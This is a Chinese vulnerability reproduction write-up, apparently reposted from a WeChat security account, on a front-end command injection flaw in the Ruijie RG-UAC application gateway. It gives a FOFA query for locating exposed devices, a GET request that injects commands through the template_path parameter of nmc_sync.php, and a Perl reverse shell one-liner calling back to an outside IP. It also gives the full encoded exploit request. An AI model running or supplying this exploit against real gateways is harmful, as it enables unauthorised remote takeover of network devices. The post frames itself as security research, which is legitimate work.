0x01 漏洞概述
0x02 复现环境
FOFA:app="Ruijie-RG-UAC"
0x03 漏洞复现
GET/view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|catHTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip
验证
GET/view/systemConfig/management/test.txtHTTP/1.1Host: your-ipAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0x04 反弹shell
安全设备的Linux很多命令是没有的,经过测试后发现只有Perl能反弹shell,在 https://revshells.isisy.com 网站生成Perl的反弹shell。
perl -e 'useSocket;$i="121.*.***.*";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
最终使用Perl反弹shell的POC如下:
GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|perl+-e+'use+Socket%3b$i%3d"121.*.***.*"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b' HTTP/1.1Host: ***.**.***.**:****User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=c73e6c1766d9a1173ac820cb22dad128Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1
原文始发于微信公众号(潇湘信安):锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论